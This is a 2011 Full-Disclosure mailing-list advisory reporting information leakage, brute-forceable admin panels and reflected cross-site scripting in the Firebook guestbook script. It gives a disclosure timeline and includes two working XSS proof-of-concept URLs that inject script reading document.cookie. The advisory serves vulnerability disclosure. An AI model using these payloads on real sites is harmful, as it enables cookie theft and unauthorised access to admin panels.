[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Multiple vulnerabilities in Firebook
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Multiple vulnerabilities in Firebook
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 11 Feb 2011 13:24:47 +0200
Hello list!
I want to warn you about Information Leakage, Brute Force and Cross-Site
Scripting vulnerabilities in Firebook.
-------------------------
Affected products:
-------------------------
Vulnerable are Firebook 3.100328 and previous versions.
----------
Details:
----------
Information Leakage (WASC-13):
http://site/cgi-bin/firebook/firebook.cgi
At the page there is section SystemInfo with Full path disclosure and names
of txt-files of web application's database.
Brute Force (WASC-11):
http://site/path_to_firebook_admin/ (hidden admin panel)
http://site/admin/index.html?account=in (public admin panel)
XSS (WASC-08):
http://site/path_to_firebook_admin/?Name=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Word=1&PutWord=1
(hidden admin panel)
http://site/admin/index.html?NAME=%3Cscript%3Ealert(document.cookie)%3C/script%3E&PASS=1&action=AccountIn
(public admin panel)
------------
Timeline:
------------
2010.11.27 - announced at my site.
2010.11.28 - informed developers.
2011.02.10 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4717/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/